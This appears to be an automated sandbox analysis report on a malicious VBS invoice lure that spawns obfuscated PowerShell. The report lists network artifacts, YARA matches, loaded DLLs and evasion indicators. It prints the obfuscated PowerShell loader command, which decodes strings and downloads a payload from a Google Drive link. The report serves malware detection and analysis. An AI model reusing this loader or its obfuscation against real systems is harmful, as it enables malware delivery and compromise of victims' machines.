Source: wscript.exe, 00000000.00000003.2013924084.000001B4139AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013570328.000001B4139AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ca5cd03d64
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C43D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A651000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A651000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2136160761.000002B82BF09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0P
Source: powershell.exe, 00000002.00000002.2136160761.000002B82BF09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.comP
Source: powershell.exe, 00000002.00000002.2136160761.000002B82AADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2136160761.000002B82AADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0&export=download
Source: powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2136160761.000002B82B932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2175250694.000002B83A805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AAD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C426000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AAD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C426000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | HTTPS traffic detected: 173.194.219.101:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.251.15.132:443 -> 192.168.2.5:49707 version: TLS 1.2

System Summary

Source: amsi64_5960.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5960, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 6742
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;For($Kummel=5; $Kummel -lt $Kummelnterdivisional; $Kummel+=(6)){$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}function Jardiniere($Overparticularity){. ($Lflaskernes) ($Overparticularity);}$Heltalsdivisions=Fjter 'BetimMSourcoBa,rizS,ouxiBousol Ove.lDe sia M,du/Erh.e5Hrels.Impla0 Bal, .ran(.rstaWpaafuiSaltknIntond nddooNonrew UdbosExplo ProwlNPosteT Dig, ,mph1Comor0 Bes . Xyl 0Knokk;Fugac Ga.seWdeseriEksplnTeko 6eksem4 unap;Vil,f ,iscoxIndls6Skder4,corz;no,ar P.pnsrEtiopv Uopd: Ch,f1Str,g2 D.da1 Cre .Moron0Aksel)Baysv InkshGdermee CicecLa sekana ho Loin/ K,us2Zec i0Mortr1Vigep0 Para0Delta1 Misu0Boble1Puche Peri.FDevasiBogorrSk.dee Flodf I,vioTurboxce.tr/Teuto1 He t2 Ra,e1Vulga.K.nne0 P.ls ';$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter ' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae .tat. 
UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp= Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter 'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. ';Jardiniere (Fjter 'Nippe$KnlesgSnus.lFodb,o,fskebPr,smaDet,mlAccro:N nexFA korjGippoe JuverAppe,dtilpleHystedHab,reFagall DyresRikocnSlaanokreoldPat,be.rederJivesn L goeIndfr=Fla,o(diarhcOrdremBodsvdGrav Opgan/skamrcOsten Del $G.senNcarraobent nFlyflpFodsvatelegiKr.dinCarrotEpicle As.erCoun,)Famil ');Jardiniere (Fjter 'Dekla$Rvestgtals lC onkoBirkebPassiaOverultopar: InteGFo.keawea.en Co,ogDesi.rBeklaeRecollUnpej=scolo$,arnfE JetsxKat aePec,sn dkslcB.rnieHa hop BranhFaar.aStetilOleoduModresMonod. Gru.sMe,kipSengel Silki FroctFolke( beha$ K astTousey hulepA.unchDittalStofloHjlp e Puszm SugepVemodySp,ereAghasmPlatyaRidgi)Dyste ');$Exencephalus=$Gangrel[0];Jardiniere (Fjter 'Unita$udlsngEtlarlAnd,noUnsa.bBr,mia RuinlRodte:Concio Ingevderuie Multrr.debpCocknlIn.bsu.adiomLingvpGener=InforNHome,eHandlwPsych- DaubO N.ckbF,ltpjDisabeDe.oncStatstEpig, Kenn S.rogry Ho,ss Udmnt Excle.uperm ,oor.SpaltN Tri.e ,krit Cuph.Bal.nWTao,ieIntoxbBeflaCSubcalTrizoiBalaneAfdranafbagt Bro, ');Jardiniere (
Source: FACTURA24021151 - BP.vbs | Initial sample: Strings found which are bigger than 50
Source: amsi64_5960.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5960, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal96.expl.evad.winVBS@6/6@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\microdactylous.Aar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e325cqtp.nie.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs"
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: FACTURA24021151 - BP.vbs | ReversingLabs: Detection: 23%
Source: FACTURA24021151 - BP.vbs | Virustotal: Detection: 15%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\microdactylous.Aar && echo $"
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptnet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: ion.pdbj source: powershell.exe, 00000002.00000002.2136067379.000002B82A53B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000002.00000002.2178700348.000002B842AC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft\CLR_v4.0n.pdb source: powershell.exe, 00000002.00000002.2135929745.000002B82A4C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbz source: powershell.exe, 00000002.00000002.2178700348.000002B842B37000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb- source: powershell.exe, 00000002.00000002.2136067379.000002B82A54E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbERSPROF] source: powershell.exe, 00000002.00000002.2178700348.000002B842B37000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("POWERSHELL "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kumme", "0")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Galactophlebitis) if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView")
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5798
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4093
Source: C:\Windows\System32\wscript.exe TID: 5380 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3012 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: wscript.exe, 00000000.00000003.2021326364.000001B4139CD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000002.2025295639.000001B4136A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013788718.000001B4136A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013518433.000001B4136F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013650085.000001B413680000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2021097550.000001B4136F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013103438.000001B4136F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2025504023.000001B4136F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.2013518433.000001B4136F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2021097550.000001B4136F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013103438.000001B4136F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2025504023.000001B4136F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWh
Source: powershell.exe, 00000002.00000002.2178700348.000002B842B21000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, 00000000.00000003.2020696147.000001B4139C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7T
